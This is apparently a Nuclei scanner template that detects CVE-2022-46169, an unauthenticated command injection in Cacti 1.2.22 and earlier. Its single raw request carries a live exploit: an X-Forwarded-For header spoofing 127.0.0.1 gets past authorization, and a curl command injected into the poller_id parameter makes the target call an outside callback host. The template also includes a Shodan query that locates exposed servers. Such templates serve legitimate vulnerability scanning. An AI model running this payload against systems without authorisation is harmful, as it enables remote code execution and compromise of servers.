id: CVE-2022-46169

info:
  name: Cacti <=1.2.22 - Remote Command Injection
  author: Hardik-Solanki,j4vaovo
  severity: critical
  description: |
    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://security-tracker.debian.org/tracker/CVE-2022-46169
    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
    - https://www.cybersecurity-help.cz/vdb/SB2022121926
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46169
    cwe-id: CWE-285
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
    epss-score: 0.97203
  metadata:
    max-request: 1
    shodan-query: title:"Login to Cacti"
    verified: true
  tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth

variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":'
          - '"local_data_id":'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"

      - type: status
        status:
          - 200

# Enhanced by md on 2023/04/10